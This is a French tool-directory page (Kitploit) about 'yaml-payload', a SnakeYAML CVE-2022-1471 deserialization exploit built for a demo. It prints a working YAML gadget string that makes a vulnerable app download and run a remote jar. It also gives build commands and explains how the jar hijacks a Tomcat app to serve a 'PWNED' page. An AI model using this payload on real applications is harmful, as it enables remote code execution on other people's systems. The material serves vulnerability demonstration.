Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
yaml-payload — Payload d'exploitation SnakeYAML CVE-2022-1471 pour la démo | Kitploit
Outils/GitHubGitHub/seal-sec-demo-2/yaml-payload
Analyse Dynamique (Sandboxing)Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubseal-sec-demo-2/yaml-payload

yaml-payload

Payload d'exploitation SnakeYAML CVE-2022-1471 pour la démo

Voir le dépôt
3il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

yaml-payload

Un payload d'exploitation de désérialisation SnakeYAML pour CVE-2022-1471, adapté de artsploit/yaml-payload (initialement basé sur mbechler/marshalsec).

Ce que ça fait

Lorsqu'il est chargé via la méthode non sécurisée Yaml.load() de SnakeYAML, ce payload prend le contrôle de l'application en cours d'exécution et la remplace par une page « You've Been PWNED » :

  1. Injecte une Valve Tomcat dans l'application Spring Boot en cours d'exécution via la réflexion, détournant le port 8080 existant — la même URL (y compris un éventuel tunnel ngrok) sert désormais la page PWNED
  2. Redirige automatiquement le navigateur — la réponse POST envoie une redirection 302, si bien que le navigateur charge immédiatement la page PWNED sans actualisation manuelle
  3. Ouvre le navigateur automatiquement vers la bonne URL (URL publique ngrok si disponible, sinon localhost:8080)
  4. Affiche les preuves de l'exploit dans la console/les journaux CI

Si l'injection de Valve Tomcat n'est pas disponible (par exemple pour une application non-Spring), le payload revient à démarrer un serveur HTTP autonome sur le port 9999 et crée automatiquement un tunnel ngrok si ngrok est en cours d'exécution.

Cela fonctionne à la fois localement sur macOS et dans les pipelines CI/CD (par exemple GitHub Actions sur Ubuntu).

Comment fonctionne la chaîne d'exploitation

Le payload SnakeYAML déclenche ScriptEngineManager via le SPI Java (Service Provider Interface) :

root@kitploit:~
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://raw.githubusercontent.com/seal-sec-demo-2/yaml-payload/main/yaml-payload.jar"]]]]
  1. SnakeYAML instancie java.net.URL pointant vers le yaml-payload.jar de ce dépôt
  2. L'enveloppe dans un URLClassLoader pour charger des classes distantes
  3. ScriptEngineManager découvre et charge AwesomeScriptEngineFactory via META-INF/services/javax.script.ScriptEngineFactory
  4. Le constructeur de la factory injecte une Valve dans le pipeline Tomcat en cours d'exécution, remplaçant chaque réponse suivante sur / par la page PWNED

Compilation

Nécessite JDK 17+ :

root@kitploit:~
javac -d build src/artsploit/AwesomeScriptEngineFactory.java
cp -r src/META-INF build/
cd build && jar -cfv ../yaml-payload.jar . && cd ..

Utilisation

Utilisé comme payload d'exploitation dans le projet maven-demo. Collez la chaîne du payload dans le champ de nom de l'application pour déclencher l'exécution de code à distance (RCE). La page de l'application sera remplacée par la page PWNED à la prochaine requête. Consultez le README de ce dépôt pour les instructions complètes de démonstration.

Télécharger l’outil